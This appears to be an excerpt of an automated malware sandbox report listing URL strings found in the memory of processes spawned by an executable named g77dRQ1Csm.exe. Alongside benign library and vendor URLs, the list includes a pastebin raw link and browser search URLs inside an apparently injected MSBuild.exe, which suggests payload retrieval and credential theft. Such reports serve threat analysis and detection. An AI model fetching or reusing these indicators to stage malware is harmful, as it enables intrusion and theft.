                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp, u42w.3.exe, 00000005.00000003.2038133988.0000000002632000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.indyproject.org/
                                Source: run.exe, 00000002.00000002.1805902147.000000000398E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.00000000053DF000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003DF5000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.00000000053D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.iolo.com/products/byepass/welcome/?utm_source=bp&utm_medium=product&p=d59cc353-e8e4-4f42-
                                Source: u42w.0.exe, u42w.0.exe, 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                                Source: u42w.0.exe, 00000001.00000002.2117404121.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                                Source: MSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                Source: MSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                Source: MSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                Source: MSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/f
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/v2/track
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.avira.com/download/
                                Source: u42w.3.exe, 00000005.00000003.2038133988.00000000025F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-
                                Source: u42w.3.exe, 00000005.00000003.2040498563.0000000000B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exebbC
                                Source: MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                Source: MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                Source: MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                                Source: MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380395000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959660867.00000173F5390000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2928112460.000001739001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959660867.00000173F5390000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2928112460.000001739001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnetw
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://indiantypefoundry.com
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iolo.azure-api.net/ent/v1
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://monitor.azure.com//.default
                                Source: MSBuild.exe, 00000019.00000002.2209535143.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
                                Source: MSBuild.exe, 00000019.00000002.2209535143.0000000003271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/z9pYkqPQPO
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.monitor.azure.com/
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://profiler.monitor.azure.com/l
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rt.services.visualstudio.com/
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://rt.services.visualstudio.com/l
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFL
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLThis
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLX8
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snapshot.monitor.azure.com/
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://snapshot.monitor.azure.com/&
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380395000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
                                Source: u42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                Source: u42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u42w.0.exe, 00000001.00000003.1767072510.00000000231BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u42w.0.exe, 00000001.00000003.1767072510.00000000231BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://taskscheduler.codeplex.com/
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://taskscheduler.codeplex.com/H
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938981217.00000173F3C1D000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/v2/track
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2.livediagnostics.monitor.azure.com/
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                                Source: MSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                Source: MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380395000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/eula/
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/eula/?
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/privacy/
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/privacy/?
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                Source: u42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                Source: u42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                                Source: u42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                                Source: u42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
